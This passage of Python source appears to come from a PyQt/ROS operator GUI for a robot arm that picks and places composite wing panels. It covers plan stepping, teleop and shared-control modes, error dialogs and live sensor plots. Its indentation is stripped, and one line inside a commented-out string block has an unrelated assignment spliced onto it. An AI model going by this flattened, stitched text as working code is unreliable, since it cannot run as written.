self.advancedmode=False
self.planListIndex=0
self.initialize_runscreen(self._runscreen)
self.commands_sent=False
self._set_controller_mode=rospy.ServiceProxy("set_controller_mode",SetControllerMode)
#rospy.Subscriber("GUI_state", ProcessState, self.process_state_set)
#rospy.Subscriber('gui_error', String, self._feedback_receive())
self.force_torque_plot_widget=QWidget()
self.joint_angle_plot_widget=QWidget()
self._welcomescreen.openConfig.clicked.connect(self._open_config_options)
self._welcomescreen.openAdvancedOptions.pressed.connect(self._open_login_prompt)
#hides these buttons from view since they are currently unused
self._welcomescreen.openConfig.setHidden(True)
self._welcomescreen.openAdvancedOptions.setHidden(True)
self._welcomescreen.toRunScreen.pressed.connect(self._to_run_screen)
self.errored=False
#self._errordiagnosticscreen.openOverheadCameraView.pressed.connect(self._open_overhead_camera_view)
#self._errordiagnosticscreen.openGripperCameraViews.pressed.connect(self._open_gripper_camera_views)
self._errordiagnosticscreen.openForceTorqueDataPlot.pressed.connect(self._open_force_torque_data_plot)
self._errordiagnosticscreen.openJointAngleDataPlot.pressed.connect(self._open_joint_angle_data_plot)
self._errordiagnosticscreen.backToRun.pressed.connect(self._to_run_screen)
#self._runscreen.widget.frame=rviz.VisualizationFrame()
#self._runscreen.widget.frame.setSplashPath( "" )
## VisualizationFrame.initialize() must be called before
## VisualizationFrame.load(). In fact it must be called
## before most interactions with RViz classes because it
## instantiates and initializes the VisualizationManager,
## which is the central class of RViz.
#self._runscreen.widget.frame.initialize()
#self.manager = self._runscreen.widget.frame.getManager()
self.skipping=False
self.callback_lock=threading.Lock()
self.callback_msg=None
rospy.Timer(rospy.Duration(0.1), self.callback_gui)
rospy.Subscriber("controller_state", controllerstate, self.callback)
# self._welcomescreen.openAdvancedOptions.pressed.connect(self._open_advanced_options)
def initialize_runscreen(self,runscreen):
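# Populates a run screen widget: adds the status LED, fills the plan list, sets the
# play icon and panel labels, and wires the navigation/teleop/shared-control buttons
# to their handlers. Used for both the normal and the advanced run screens.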
runscreen.connectionLayout.addWidget(self.runscreenstatusled,0,1)
runscreen.planList.setSelectionMode(QAbstractItemView.ExtendedSelection)
for entry in self.plans:
listentry=QListWidgetItem(entry)
listentry.setFlags(Qt.ItemIsSelectable)
runscreen.planList.addItem(listentry)
icon=QIcon()
icon.addPixmap(QPixmap(self.play_button))
runscreen.nextPlan.setIcon(icon)
runscreen.nextPlan.setIconSize(QSize(100,100))
runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
runscreen.panelType.setText(self.panel_type)
runscreen.placementNestTarget.setText("Leeward Mid Panel Nest")
runscreen.panelType.setReadOnly(True)
runscreen.placementNestTarget.setReadOnly(True)
runscreen.backToWelcome.pressed.connect(self._to_welcome_screen)
#self._runscreen.toErrorScreen.pressed.connect(self._to_error_screen)
runscreen.nextPlan.pressed.connect(self._next_plan)
runscreen.previousPlan.pressed.connect(self._previousPlan)
runscreen.resetToHome.pressed.connect(self._reset_position)
runscreen.stopPlan.pressed.connect(self._stopPlan)
runscreen.accessTeleop.pressed.connect(self.change_teleop_modes)
runscreen.sharedControl.pressed.connect(self.start_shared_control)
runscreen.stopPlan.setDisabled(True)
runscreen.skipCommands.pressed.connect(self.start_skipping)
def led_change(self,led,state):
led.setChecked(state)
def _to_welcome_screen(self):
self.stackedWidget.setCurrentIndex(0)
def _set_controller_mode_dispatch(self,mode,speed,bias,threshold):
req=SetControllerModeRequest(mode,speed,bias,threshold)
res=self._set_controller_mode(req)
if(res.error_code.mode!=ControllerMode.MODE_SUCCESS):
self.step_executor.error="GUI failed to set controller mode"
self.step_executor.error_signal.emit()
def _to_run_screen(self):
#self.controller_commander.set_controller_mode(self.controller_commander.MODE_HALT,1,[],[])
self.set_controller_mode(ControllerMode.MODE_HALT,1,[],[])
if(self.stackedWidget.currentIndex()==0):
self.messagewindow=PanelSelectorWindow()
self.messagewindow.show()
self.messagewindow.setFixedSize(self.messagewindow.size())
if self.messagewindow.exec_():
next_selected_panel=self.messagewindow.get_panel_selected()
if(next_selected_panel != None):
self.panel_type=next_selected_panel
self.placement_target=self.placement_targets[self.panel_type]
self.stackedWidget.setCurrentIndex(1)
self._runscreen.panelType.setText(self.panel_type)
if(self.panel_type=='leeward_mid_panel'):
self._runscreen.placementNestTarget.setText("Leeward Mid Panel Nest")
elif(self.panel_type=='leeward_tip_panel'):
self._runscreen.placementNestTarget.setText("Leeward Tip Panel Nest")
else:
raise Exception('Unknown panel type selected')
def _to_error_screen(self):
self.stackedWidget.setCurrentIndex(2)
def _open_login_prompt(self):
if(self._login_prompt()):
self.stackedWidget.removeWidget(self._runscreen)
self._runscreenadvanced=QWidget()
loadUi(self.skippingrunscreenui, self._runscreenadvanced)
self.stackedWidget.addWidget(self._runscreenadvanced)
self.initialize_runscreen(self._runscreenadvanced)
self._runscreen.skipCommands.pressed.connect(self.start_skipping)
self.advancedmode=True
def _login_prompt(self):
self.loginprompt=UserAuthenticationWindow()
if self.loginprompt.exec_():
#self.loginprompt.show()
#while(not self.loginprompt.returned):
#pass
return True
else:
return False
def _open_config_options(self):
if(self._login_prompt()):
self.led_change(self.robotconnectionled,True)
#def _open_overhead_camera_view(self):
#def _open_gripper_camera_views(self):
def _open_force_torque_data_plot(self):
self.plot_container=[]
self.x_data = np.arange(1)
self.force_torque_app=QApplication([])
self.force_torque_plot_widget=pg.plot()
self.force_torque_plot_widget.addLegend()
#self.layout.addWidget(self.force_torque_plot_widget,0,1)
self.force_torque_plot_widget.showGrid(x=True, y=True)
self.force_torque_plot_widget.setLabel('left','Force/Torque','N/N*m')
self.force_torque_plot_widget.setLabel('bottom','Sample Number','n')
self.plot_container.append(self.force_torque_plot_widget.plot(pen=(255,0,0),name="Torque X"))
self.plot_container.append(self.force_torque_plot_widget.plot(pen=(0,255,0),name="Torque Y"))
self.plot_container.append(self.force_torque_plot_widget.plot(pen=(0,0,255),name="Torque Z"))
self.plot_container.append(self.force_torque_plot_widget.plot(pen=(255,255,0),name="Force X"))
self.plot_container.append(self.force_torque_plot_widget.plot(pen=(0,255,255),name="Force Y"))
self.plot_container.append(self.force_torque_plot_widget.plot(pen=(255,0,255),name="Force Z"))
#self.force_torque_plotter=PlotManager(title='Force Torque Data',nline=3,widget=self.force_torque_plot_widget)
#self.force_torque_plot_widget.show()
#self.force_torque_plotter.add("Hello", np.arange(10))
#self.force_torque_plotter.update()
#self.rosGraph.show()
#self.rosGraph.exec_()
def _open_joint_angle_data_plot(self):
self.plot_container=[]
self.x_data = np.arange(1)
self.joint_angle_app=QApplication([])
self.joint_angle_plot_widget=pg.plot()
self.joint_angle_plot_widget.addLegend()
#self.layout.addWidget(self.joint_angle_plot_widget,0,1)
self.joint_angle_plot_widget.showGrid(x=True, y=True)
self.joint_angle_plot_widget.setLabel('left','Force/Torque','N/N*m')
self.joint_angle_plot_widget.setLabel('bottom','Sample Number','n')
self.plot_container.append(self.joint_angle_plot_widget.plot(pen=(255,0,0),name="Joint 1"))
self.plot_container.append(self.joint_angle_plot_widget.plot(pen=(0,255,0),name="Joint 2"))
self.plot_container.append(self.joint_angle_plot_widget.plot(pen=(0,0,255),name="Joint 3"))
self.plot_container.append(self.joint_angle_plot_widget.plot(pen=(255,255,0),name="Joint 4"))
self.plot_container.append(self.joint_angle_plot_widget.plot(pen=(0,255,255),name="Joint 5"))
self.plot_container.append(self.joint_angle_plot_widget.plot(pen=(255,0,255),name="Joint 6"))
self.plot_container.append(self.joint_angle_plot_widget.plot(pen=(255,255,255),name="Joint 7"))
def _open_rviz_prompt(self):
subprocess.Popen(['python', self.rviz_starter])
# def _open_advanced_options(self):
# main = Main()
# sys.exit(main.main(sys.argv, standalone='rqt_rviz/RViz', plugin_argument_provider=add_arguments))
def _raise_rviz_window(self):
subprocess.call(["xdotool", "search", "--name", "rviz", "windowraise"])
def _next_plan(self):
self.plan_list_reset()
if(not(self.skipping)):
self._runscreen.nextPlan.setDisabled(True)
self._runscreen.previousPlan.setDisabled(True)
self._runscreen.resetToHome.setDisabled(True)
self._runscreen.stopPlan.setDisabled(False)
self.reset_teleop_button()
if(self.errored and not self.recover_from_pause):
self.planListIndex-=1
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
if(self.planListIndex+1==self._runscreen.planList.count()):
self.planListIndex=0
elif(self.recover_from_pause):
self.recover_from_pause=False
#TODO test this
else:
self.planListIndex+=1
#g=GUIStepGoal(self.gui_execute_states[self.planListIndex], self.panel_type)
#self.client_handle=self.client.send_goal(g,done_cb=self._process_done,feedback_cb=self._feedback_receive)
self.step_executor._nextPlan(self.panel_type,self.planListIndex,self.placement_target)
#self._runscreen.planList.item(self.planListIndex).setSelected(True)
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
if(self.errored):
icon=QIcon()
icon.addPixmap(QPixmap(self.play_button))
self._runscreen.nextPlan.setIcon(icon)
self._runscreen.nextPlan.setIconSize(QSize(100,100))
self.errored=False
#errored
if(self.rewound):
self.rewound=False
self._runscreen.previousPlan.setDisabled(False)
else:
self.planListIndex+=1
#self._runscreen.planList.item(self.planListIndex).setSelected(True)
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
"""
self._runscreen.vacuum.setText("OFF")
self._runscreen.panel.setText("Detached")
self._runscreen.panelTag.setText("Not Localized")
self._runscreen.nestTag.setText("Not Localized")
self._runscreen.overheadCamera.setText("OFF")
self._runscreen.gripperCamera.setText("OFF")
self._runscreen.forceSensor.setText("Biased to 0")
self._runscreen.pressureSensor.setText("[0,0,0]")
"""
'''
elif(self.planListIndex==1):
self.send_thread=threading.Thread(target=self._execute_steps,args=(1,self.last_step, self.panel_type,0))
rospy.loginfo("thread_started")
self.send_thread.setDaemon(True)
self.send_thread.start()
self._send_event.set()
#self._execute_step('plan_pickup_prepare',self.panel_type)
#self._execute_step('move_pickup_prepare')'''"""
self._runscreen.vacuum.setText("OFF")
self._runscreen.panel.setText("Detached")
self._runscreen.panelTag.setText("Localized")
self._runscreen.nestTag.setText("Not Localized")
self._runscreen.overheadCamera.setText("ON")
self._runscreen.gripperCamera.setText("OFF")
self._runscreen.forceSensor.setText("ON")
self._runscreen.pressureSensor.setText("[0,0,0]")
""""""
elif(self.planListIndex==2):
self.send_thread=threading.Thread(target=self._execute_steps,args=(2,self.last_step))
self.send_thread.setDaemon(True)
self.send_thread.start()
self._send_event.set()""""""
self._execute_step('plan_pickup_lower')
self._execute_step('move_pickup_lower')
self._execute_step('plan_pickup_grab_first_step')
self._execute_step('move_pickup_grab_first_step')
self._execute_step('plan_pickup_grab_second_step')
self._execute_step('move_pickup_grab_second_step')
self._execute_step('plan_pickup_raise')
self._execute_step('move_pickup_raise')
self._runscreen.vacuum.setText("OFF")
self._runscreen.panel.setText("Detached")
self._runscreen.panelTag.setText("Localized")self.controller_commander=controller_commander_pkg.arm_composites_manufacturing_controller_commander()
self._runscreen.nestTag.setText("Not Localized")
self._runscreen.overheadCamera.setText("OFF")
self._runscreen.gripperCamera.setText("OFF")
self._runscreen.forceSensor.setText("ON")
self._runscreen.pressureSensor.setText("[0,0,0]")
""""""
elif(self.planListIndex==3):
if(self.panel_type=="leeward_mid_panel"):
subprocess.Popen(['python', self.YC_transport_code, 'leeward_mid_panel'])
elif(self.panel_type=="leeward_tip_panel"):
subprocess.Popen(['python', self.YC_transport_code, 'leeward_tip_panel'])
self.commands_sent=True
"""
#self.send_thread=threading.Thread(target=self._execute_steps,args=(3,self.last_step,self.placement_target,0))
#self.send_thread.setDaemon(True)
#self.send_thread.start()
#self._send_event.set()"""
"""
self._execute_step('plan_transport_payload',self.placement_target)
self._execute_step('move_transport_payload')
self._runscreen.vacuum.setText("ON")
self._runscreen.panel.setText("Attached")
self._runscreen.panelTag.setText("Localized")
self._runscreen.nestTag.setText("Not Localized")
self._runscreen.overheadCamera.setText("OFF")
self._runscreen.gripperCamera.setText("OFF")
self._runscreen.forceSensor.setText("ON")
self._runscreen.pressureSensor.setText("[1,1,1]")
""""""
elif(self.planListIndex==4):
if(self.panel_type=="leeward_mid_panel"):
subprocess.Popen(['python', self.YC_place_code])
elif(self.panel_type=="leeward_tip_panel"):
subprocess.Popen(['python', self.YC_place_code2])
self.commands_sent=True
""""""
self._runscreen.vacuum.setText("ON")
self._runscreen.panel.setText("Attached")
self._runscreen.panelTag.setText("Localized")
self._runscreen.nestTag.setText("Not Localized")
self._runscreen.overheadCamera.setText("OFF")
self._runscreen.gripperCamera.setText("OFF")
self._runscreen.forceSensor.setText("OFF")
self._runscreen.pressureSensor.setText("[1,1,1]")
"""
def _stopPlan(self):
#self.client.cancel_all_goals()
#self.process_client.cancel_all_goals()
#g=GUIStepGoal("stop_plan", self.panel_type)
#self.client_handle=self.client.send_goal(g,feedback_cb=self._feedback_receive)
self.plan_list_reset()
if(self.shared_control_enabled):
self.start_shared_control()
if(self.planListIndex!=0):
self._runscreen.planList.item(self.planListIndex-1).setBackground(Qt.white)
self._runscreen.planList.item(self.planListIndex-1).setForeground(Qt.darkGray)
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
self.repaint_signal.emit()
self.step_executor._stopPlan()
self.recover_from_pause=True
self._runscreen.nextPlan.setDisabled(False)
self._runscreen.previousPlan.setDisabled(False)
self._runscreen.resetToHome.setDisabled(False)
self._runscreen.stopPlan.setDisabled(True)
self.reset_teleop_button()
def _previousPlan(self):
self._runscreen.nextPlan.setDisabled(True)
self._runscreen.previousPlan.setDisabled(True)
self._runscreen.resetToHome.setDisabled(True)
self.plan_list_reset()
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
if(self.planListIndex==0):
pass
#elif(self.recover_from_pause):
else:
self.planListIndex-=1
self.recover_from_pause=False
self.reset_teleop_button()
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
self.repaint_signal.emit()
self._runscreen.stopPlan.setDisabled(False)
self.rewound=True
if(self.errored):
icon=QIcon()
icon.addPixmap(QPixmap(self.play_button))
self._runscreen.nextPlan.setIcon(icon)
self._runscreen.nextPlan.setIconSize(QSize(100,100))
self.errored=False
#errored
#self._runscreen.previousPlan.setDisabled(True)
#g=GUIStepGoal("previous_plan", self.panel_type)
#self.client_handle=self.client.send_goal(g,feedback_cb=self._feedback_receive,done_cb=self._process_done)
self.step_executor._previousPlan()
@pyqtSlot()
def _feedback_receive(self):
with self._lock:
self.errored=True
messagewindow=QMessageBox()
messagewindow.setStyleSheet("QMessageBox{background: rgb(255,255,255); border: none;font-family: Arial; font-style: normal; font-size: 20pt; color: #000000 ; }")
button=QPushButton("Continue")
button.setStyleSheet('QPushButton {font-family:Arial;font-style:normal;font-size:20pt;}')
error_msg='Operation failed with error:\n'+self.step_executor.error
messagewindow.setText(error_msg)
messagewindow.addButton(button,QMessageBox.AcceptRole)
ret = messagewindow.exec_()
#confirm=QMessageBox.warning(messagewindow, 'Error',error_msg)
#messagewindow.informativeText.setFont(f)
self._runscreen.nextPlan.setDisabled(False)
self._runscreen.previousPlan.setDisabled(False)
self._runscreen.resetToHome.setDisabled(False)
self._runscreen.stopPlan.setDisabled(True)
self.plan_list_reset()
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.yellow)
self.repaint_signal.emit()
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
if(self.rewound):
self.rewound=False
else:
if('reset' in self.step_executor.state):
self.planListIndex=self.pre_reset_list_index
elif('pickup_grab' not in self.step_executor.state and 'gripper' not in self.step_executor.state):
#if not (self.recover_from_pause):
# self.planListIndex-=1
icon=QIcon()
icon.addPixmap(QPixmap(self.retry_button))
self._runscreen.nextPlan.setIcon(icon)
self._runscreen.nextPlan.setIconSize(QSize(100,100))
else:
self._runscreen.nextPlan.setDisabled(True)
def process_state_set(self):
#if(data.state!="moving"):
self.plan_list_reset()
self._runscreen.stopPlan.setDisabled(True)
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.green)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.white)
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
self.repaint_signal.emit()
self._runscreen.nextPlan.setDisabled(False)
self._runscreen.previousPlan.setDisabled(False)
self._runscreen.resetToHome.setDisabled(False)
#rospy.loginfo("errored status:"+str(self.errored))
def _reset_position(self):
messagewindow=QMessageBox()
messagewindow.setStyleSheet("QMessageBox{background: rgb(255,255,255); border: none;font-family: Arial; font-style: normal; font-size: 20pt; color: #000000 ; }")
yesbutton=QPushButton("Yes")
nobutton=QPushButton("No")
yesbutton.setStyleSheet('QPushButton {font-family:Arial;font-style:normal;font-size:20pt;}')
nobutton.setStyleSheet('QPushButton {font-family:Arial;font-style:normal;font-size:20pt;}')
messagewindow.setText('Proceed to Reset Position?')
messagewindow.addButton(nobutton,QMessageBox.NoRole)
messagewindow.addButton(yesbutton,QMessageBox.AcceptRole)
reply = messagewindow.exec_()
rospy.loginfo(str(reply))
#messagewindow=VacuumConfirm()
#reply = QMessageBox.question(messagewindow, 'Path Verification',
#'Proceed to Reset Position', QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply==1:
self.pre_reset_list_index=self.planListIndex
self._runscreen.stopPlan.setDisabled(False)
self._runscreen.nextPlan.setDisabled(True)
self._runscreen.previousPlan.setDisabled(True)
self._runscreen.resetToHome.setDisabled(True)
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
self.repaint_signal.emit()
self.planListIndex=0
#g=GUIStepGoal("reset", self.panel_type)
#self.client_handle=self.client.send_goal(g,feedback_cb=self._feedback_receive)
self.reset_teleop_button()
self.step_executor._nextPlan(None,self.planListIndex)
#self._runscreen.planList.item(self.planListIndex).setSelected(True)
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
#subprocess.Popen(['python', self.reset_code])
#errored
if(self.errored):
icon=QIcon()
icon.addPixmap(QPixmap(self.play_button))
self._runscreen.nextPlan.setIcon(icon)
self._runscreen.nextPlan.setIconSize(QSize(100,100))
self.errored=False
else:
rospy.loginfo("Reset Rejected")
def start_shared_control(self):
self.shared_control_enabled=not(self.shared_control_enabled)
if(self.shared_control_enabled):
self.step_executor.controller_mode=ControllerMode.MODE_SHARED_TRAJECTORY
self._runscreen.sharedControl.setStyleSheet('QPushButton {background-color: orange; color: white;}')
'''
button = QtGui.QPushButton()
palette = self.button.palette()
role = self.button.backgroundRole() #choose whatever you like
palette.setColor(role, QColor('red'))
button.setPalette(palette)
self.button.setAutoFillBackground(True)
'''
else:
self.step_executor.controller_mode=ControllerMode.MODE_AUTO_TRAJECTORY
self._runscreen.sharedControl.setStyleSheet('QPushButton {background-color: white; color: black;}')
def change_teleop_modes(self):
#with self._lock:
self.current_teleop_mode+=1
try:
if(self.current_teleop_mode==len(self.teleop_modes)):
self.current_teleop_mode=1
self.set_controller_mode(ControllerMode.MODE_HALT,1,[],[])
#self.controller_commander.set_controller_mode(self.controller_commander.MODE_HALT,1,[],[])
elif(self.current_teleop_mode==1):
self.reset_teleop_button()
elif(self.current_teleop_mode==2):
#self.controller_commander.set_controller_mode(self.controller_commander.MODE_JOINT_TELEOP,1,[],[])
self.set_controller_mode(ControllerMode.MODE_JOINT_TELEOP,1,[],[])
elif(self.current_teleop_mode==3):
self.set_controller_mode(ControllerMode.MODE_CARTESIAN_TELEOP,1,[],[])
#self.controller_commander.set_controller_mode(self.controller_commander.MODE_CARTESIAN_TELEOP,1,[],[])
elif(self.current_teleop_mode==4):
self.set_controller_mode(ControllerMode.MODE_CYLINDRICAL_TELEOP,1,[],[])
#self.controller_commander.set_controller_mode(self.controller_commander.MODE_CYLINDRICAL_TELEOP,1,[],[])
elif(self.current_teleop_mode==5):
self.set_controller_mode(ControllerMode.MODE_SPHERICAL_TELEOP,1,[],[])
#self.controller_commander.set_controller_mode(self.controller_commander.MODE_SPHERICAL_TELEOP,1,[],[])
rospy.loginfo("Entering teleop mode:"+self.teleop_modes[self.current_teleop_mode])
button_string=self.teleop_button_string+self.teleop_modes[self.current_teleop_mode]
self._runscreen.accessTeleop.setText(button_string)
except Exception as err:
rospy.loginfo(str(err))
self.step_executor.error="Controller failed to set teleop mode"
self.step_executor.error_signal.emit()
def set_controller_mode(self,mode,speed_scalar=1.0,ft_bias=[], ft_threshold=[]):
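# Thin wrapper around the set_controller_mode service: builds the request from the
# given mode, speed scalar, force/torque bias and stop threshold, and raises the GUI
# error signal if the controller does not report MODE_SUCCESS.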
req=SetControllerModeRequest()
req.mode.mode=mode
req.speed_scalar=speed_scalar
req.ft_bias=ft_bias
req.ft_stop_threshold=ft_threshold
res=self._set_controller_mode(req)
if (res.error_code.mode != ControllerMode.MODE_SUCCESS):
self.step_executor.error="GUI failed to set controller mode"
self.step_executor.error_signal.emit()
def error_recovery_button(self):
self.current_teleop_mode=0
def reset_teleop_button(self):
self.current_teleop_mode=1
self.set_controller_mode(ControllerMode.MODE_HALT,1,[],[])
#self.controller_commander.set_controller_mode(self.controller_commander.MODE_HALT,1,[],[])
button_string=self.teleop_button_string+self.teleop_modes[self.current_teleop_mode]
self._runscreen.accessTeleop.setText(button_string)
def plan_list_reset(self):
for i in range(self._runscreen.planList.count()):
self._runscreen.planList.item(i).setForeground(Qt.darkGray)
self._runscreen.planList.item(i).setBackground(Qt.white)
self.repaint_signal.emit()
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
def start_skipping(self):
self.skipping=not(self.skipping)
if(self.skipping):
self._runscreen.skipCommands.setStyleSheet('QPushButton {background-color: orange; color: white;}')
'''
button = QtGui.QPushButton()
palette = self.button.palette()
role = self.button.backgroundRole() #choose whatever you like
palette.setColor(role, QColor('red'))
button.setPalette(palette)
self.button.setAutoFillBackground(True)
'''
else:
self._runscreen.skipCommands.setStyleSheet('QPushButton {background-color: white; color: black;}')
def callback(self,data):
with self.callback_lock:
self.callback_msg=data
def callback_gui(self,evt):
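# Timer-driven GUI refresh (scheduled at 10 Hz via rospy.Timer): reads the most recent
# controller_state message cached by callback(), updates the connection/camera LEDs,
# the force/torque readout, and any open live plots.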
#self._widget.State_info.append(data.mode)
#print "callback " + str(time.time())
with self.callback_lock:
data = self.callback_msg
if data is None:
return
if(self.stackedWidget.currentIndex()==0):
service_list=rosservice.get_service_list()
if('/overhead_camera/camera_trigger' in service_list):
self.led_change(self.overheadcameraled,True)
else:
self.led_change(self.overheadcameraled,False)
if('/gripper_camera_2/camera_trigger' in service_list):
self.led_change(self.grippercameraled,True)
else:
self.led_change(self.grippercameraled,False)
if(self.stackedWidget.currentIndex()==2):
if(self.count>10):
#stringdata=str(data.mode)
#freeBytes.acquire()
#####consoleData.append(str(data.mode))
self._errordiagnosticscreen.consoleWidget_2.addItem(str(data.joint_position))
self.count=0
#print data.joint_position
self.count+=1
#self._widget.State_info.scrollToBottom()
#usedBytes.release()
#self._data_array.append(stringdata)
#print self._widget.State_info.count()
if(self._errordiagnosticscreen.consoleWidget_2.count()>200):
item=self._errordiagnosticscreen.consoleWidget_2.takeItem(0)
#print "Hello Im maxed out"
del item
'''
if self.in_process:
if self.client.get_state() == actionlib.GoalStatus.PENDING or self.client.get_state() == actionlib.GoalStatus.ACTIVE:
self._runscreen.nextPlan.setDisabled(True)
self._runscreen.previousPlan.setDisabled(True)
self._runscreen.resetToHome.setDisabled(True)
rospy.loginfo("Pending")
elif self.client.get_state() == actionlib.GoalStatus.SUCCEEDED:
self._runscreen.nextPlan.setDisabled(False)
self._runscreen.previousPlan.setDisabled(False)
self._runscreen.resetToHome.setDisabled(False)
self.in_process=False
rospy.loginfo("Succeeded")
elif self.client.get_state() == actionlib.GoalStatus.ABORTED:
self.in_process=False
if(not self.recover_from_pause):
raise Exception("Process step failed and aborted")
elif self.client.get_state() == actionlib.GoalStatus.REJECTED:
self.in_process=False
raise Exception("Process step failed and Rejected")
elif self.client.get_state() == actionlib.GoalStatus.LOST:
self.in_process=False
raise Exception("Process step failed and lost")
'''
#if(self.count>10):
# self.count=0
if(data.mode.mode<0):
'''
#self.stackedWidget.setCurrentIndex(2)
if(data.mode.mode==-5 or data.mode.mode==-6):
error_msg="Error mode %d : Controller is not synched or is in Invalid State" %data.mode.mode
self._errordiagnosticscreen.errorLog.setPlainText(error_msg)
if(data.mode.mode==-3 or data.mode.mode==-2):
error_msg="Error mode %d : Controller operation or argument is invalid" %data.mode.mode
self._errordiagnosticscreen.errorLog.setPlainText(error_msg)
if(data.mode.mode==-13 or data.mode.mode==-14):
error_msg="Error mode %d : Sensor fault or communication Error" %data.mode.mode
self._errordiagnosticscreen.errorLog.setPlainText(error_msg)
if(data.mode.mode==-1):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -1: Internal system error detected")
if(data.mode.mode==-4):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -4: Robot Fault detected")
if(data.mode.mode==-7):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -7: Robot singularity detected, controller cannot perform movement")
if(data.mode.mode==-8):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -8: Robot Setpoint could not be tracked, robot location uncertain")
if(data.mode.mode==-9):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -9: Commanded Trajectory is invalid and cannot be executed. Please replan")
if(data.mode.mode==-10):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -10: Trajectory Tracking Error detected, robot position uncertain, consider lowering speed of operation to improve tracking")
if(data.mode.mode==-11):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -11: Robot trajectory aborted.")
if(data.mode.mode==-12):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -12: Robot Collision Imminent, operation stopped to prevent damage")
if(data.mode.mode==-15):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -15: Sensor state is invalid")
if(data.mode.mode==-16):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -16: Force Torque Threshold Violation detected, stopping motion to prevent potential collisions/damage")
if(data.mode.mode==-17):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -17: Invalid External Setpoint given")
'''
#messagewindow=VacuumConfirm()
#reply = QMessageBox.question(messagewindow, 'Connection Lost',
# 'Robot Connection Lost, Return to Welcome Screen?', QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
#if reply==QMessageBox.Yes:
#
# self.disconnectreturnoption=False
#else:
# self.disconnectreturnoption=True
if(data.mode.mode==-16 and "pickup_grab" in self.step_executor.state):
pass
else:
self.led_change(self.robotconnectionled,False)
self.led_change(self.runscreenstatusled,False)
self.error_recovery_button()
self._runscreen.accessTeleop.setText("Recover from\n Error Code:"+str(data.mode.mode))
else:
self.led_change(self.robotconnectionled,True)
self.led_change(self.runscreenstatusled,True)
#if(self.advancedmode):
self._runscreen.readout.setText(str(data.ft_wrench))
if(data.ft_wrench_valid=="False"):
self.stackedWidget.setCurrentIndex(0)
self.led_change(self.forcetorqueled,False)
else:
self.led_change(self.forcetorqueled,True)
#self.service_list=rosservice.get_service_list()
#if(self.disconnectreturnoption and data.error_msg==""):
# self.disconnectreturnoption=False
#self.count+=1
if(not self.force_torque_plot_widget.isHidden()):
self.x_data=np.concatenate((self.x_data,[data.header.seq]))
incoming=np.array([data.ft_wrench.torque.x,data.ft_wrench.torque.y,data.ft_wrench.torque.z,data.ft_wrench.force.x,data.ft_wrench.force.y,data.ft_wrench.force.z]).reshape(6,1)
self.force_torque_data=np.concatenate((self.force_torque_data,incoming),axis=1)
if(self.data_count>500):
self.force_torque_data=self.force_torque_data[...,1:]
self.x_data=self.x_data[1:]
self.force_torque_plot_widget.setRange(xRange=(self.x_data[1],self.x_data[-1]))
else:
self.data_count+=1
for i in range(6):
self.plot_container[i].setData(self.x_data,self.force_torque_data[i,...])
self.force_torque_app.processEvents()
if(not self.joint_angle_plot_widget.isHidden()):
self.x_data=np.concatenate((self.x_data,[data.header.seq]))
incoming=np.array(data.joint_position).reshape(7,1) # the 7 joint angles, matching the 7 plot curves below (the wrench fields belong to the force/torque plot)
self.joint_angle_data=np.concatenate((self.joint_angle_data,incoming),axis=1)
if(self.data_count>500):
self.joint_angle_data=self.joint_angle_data[...,1:]
self.x_data=self.x_data[1:]
self.joint_angle_plot_widget.setRange(xRange=(self.x_data[1],self.x_data[-1]))
else:
self.data_count+=1
for i in range(7):
self.plot_container[i].setData(self.x_data,self.joint_angle_data[i,...])
self.joint_angle_app.processEvents()
#if(len(self._data_array)>10):
# for x in self._data_array:
